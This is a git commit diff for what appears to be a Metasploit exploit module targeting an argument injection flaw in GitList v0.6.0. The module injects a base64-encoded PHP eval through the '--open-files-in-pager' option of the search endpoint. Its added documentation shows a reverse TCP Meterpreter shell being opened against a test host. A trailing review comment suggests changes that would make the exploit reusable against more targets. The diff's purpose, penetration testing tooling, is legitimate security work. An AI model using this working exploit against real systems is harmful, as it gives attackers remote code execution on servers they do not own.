added documentation and check

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-05 15:47:21 -05:00
parent 507fd22958
commit 2b452d5681
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 57 additions and 32 deletions


@ -0,0 +1,37 @@
## Vulnerable Application
This module exploits an argument injection vulnerability in GitList v0.6.0
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use [exploit/multi/http/gitlist_arg_injection]`
4. Do: `set RHOSTS [IP]`
5. Do: `run`
6. You should get a session.
## Scenarios
### Tested on Ubuntu 18.04 x64
```
msf5 > use exploit/multi/http/gitlist_arg_injection
msf5 exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141
rhosts => 192.168.37.141
msf5 exploit(multi/http/gitlist_arg_injection) > check
[+] 192.168.37.141:80 The target is vulnerable.
msf5 exploit(multi/http/gitlist_arg_injection) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (37775 bytes) to 192.168.37.141
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.141:35804) at 2018-07-05 14:22:39 -0500
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```


@ -10,9 +10,10 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
'Name' => "Gitlist v0.6 Argument Injection",
'Description' => %q{
Say something that the user might need to know
This module exploits an argument injection vulnerability in Gitlist v0.6.
The vulnerability arises from GitList improperly validating input using the php function, 'escapeshellarg'.
},
'License' => MSF_LICENSE,
'Author' => [ 'Kacper Szurek', # EDB POC
@ -20,40 +21,18 @@ class MetasploitModule < Msf::Exploit::Remote
],
'References' =>
[
[ 'EDB', '44548' ]
[ 'EDB', '44548' ],
[ 'URL', 'https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'System or software version',
{
'Ret' => 0x41414141 # This will be available in `target.ret`
}
]
[ 'Gitlist v0.6', { } ]
],
'Payload' =>
{
'BadChars' => "\x20"
},
'Privileged' => false,
'DisclosureDate' => "Apr 26 2018",
'DefaultTarget' => 0))
end
def make_request
postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
php = %Q|<?php #{payload.encoded} ?>|
cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
cmd << '\\"));"'
postRes = send_request_cgi(
'method' => 'POST',
'uri' => postUri,
'vars_post' => { 'query' => cmd }
)
end
def check
@ -63,15 +42,24 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => uri
)
unless res
return Exploit::CheckCode::Safe
if res && res.code == 200 && /Powered by .*GitList 0.6.0/.match(res.body)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Detected if res.code == 200
return Exploit::CheckCode::Unknown
end
def exploit
make_request
end
postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
cmd << '\\"));"'
postRes = send_request_cgi(
'method' => 'POST',
'uri' => postUri,
'vars_post' => { 'query' => cmd }
)
end
end
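Review bot: In `check`, matching the `Powered by … GitList 0.6.0` footer only establishes the version banner, so the new branch should return `Exploit::CheckCode::Appears` rather than `Vulnerable`, which Metasploit reserves for a condition that actually confirms exploitability. The `res &&` in that condition looks like it replaced the old `unless res` early return, so if `return Exploit::CheckCode::Detected if res.code == 200` survives as context it will raise `NoMethodError` on a nil response; keep an explicit `return Exploit::CheckCode::Unknown unless res` ahead of it, and escape the dots in the version pattern (`/Powered by .*GitList 0\.6\.0/`) since an unescaped `.` matches any character. In `exploit`, `normalize_uri(target_uri.path, '/gitlist/tree/c/search')` hard-codes both the `gitlist` prefix (duplicated whenever TARGETURI is already `/gitlist`) and a repository named `c`, so the module only fires against targets that happen to host a repo with that name; exposing the repository name as a datastore option would make it reusable, and the assigned-but-unused `postRes` can be dropped. The base64 envelope means the payload can never contain `\x20`, so the `BadChars` entry is redundant rather than protective. `check` begins in the previous hunk and the `uri` it requests is built outside this one.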